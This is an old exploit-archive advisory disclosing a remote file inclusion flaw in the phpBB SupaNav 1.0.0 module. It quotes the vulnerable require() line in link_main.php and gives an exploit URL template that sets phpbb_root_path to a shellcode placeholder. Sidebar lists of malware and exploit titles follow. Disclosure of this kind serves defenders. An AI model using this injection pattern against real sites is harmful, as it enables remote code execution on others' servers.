phpbbsupanav-rfi.txt

Posted on 19 July 2007

phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability Vendor: http://www.phpbbhacks.com/download/8003 Download: http://www.phpbbhacks.com/load.php?id=8003 Founder: bd0rk Website 1: www.soh-crew.it.tt Website 2: www.school-of-hack.net Contact: bd0rk[at]hackermail.com ICQ: 249-613-511 Greetings: str0ke, TheJT, rgod, Kacper, GolD_M Vulnerable Code in link_main.php: -------------------------------------------------------------------------------------- require($phpbb_root_path.'language/lang_'.$userdata['user_lang'].'/lang_nav.'.$phpEx); -------------------------------------------------------------------------------------- $phpbb_root_path is not declared before require [+]Exploit: http://[target]/[directory]/link_main.php?phpbb_root_path=[ShellCode] ####The 18 years old german Hacker bd0rk####

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection
htmlLawed 1.2.5 Remote Command Execution
Online Tours And Travels Management System 1.0 SQL Injection

Last 20